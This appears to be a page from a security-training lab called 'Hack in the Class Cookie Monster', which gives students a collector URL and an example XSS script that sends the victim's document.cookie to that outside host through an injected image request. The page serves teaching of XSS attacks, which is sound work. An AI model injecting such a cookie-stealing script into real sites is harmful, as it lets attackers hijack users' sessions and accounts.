Hack in the Class Cookie Monster
To feed the cookie monster, use this url:
https://cookie-monster.lab.hackintheclass.org/eat.php?monster=15ihuic5o856vghkimd2oc3dg0&cookie=THECOOKIEYOUWANTTOGIVEExample XSS:
<script type="text/javascript"> var img = document.createElement("img"); img.src="https://cookie-monster.lab.hackintheclass.org" + "/eat.php?monster=15ihuic5o856vghkimd2oc3dg0" + "&cookie=" + encodeURIComponent(document.cookie); document.body.appendChild(img); </script>
Your cookie monster has eaten these cookies:
No cookies yet.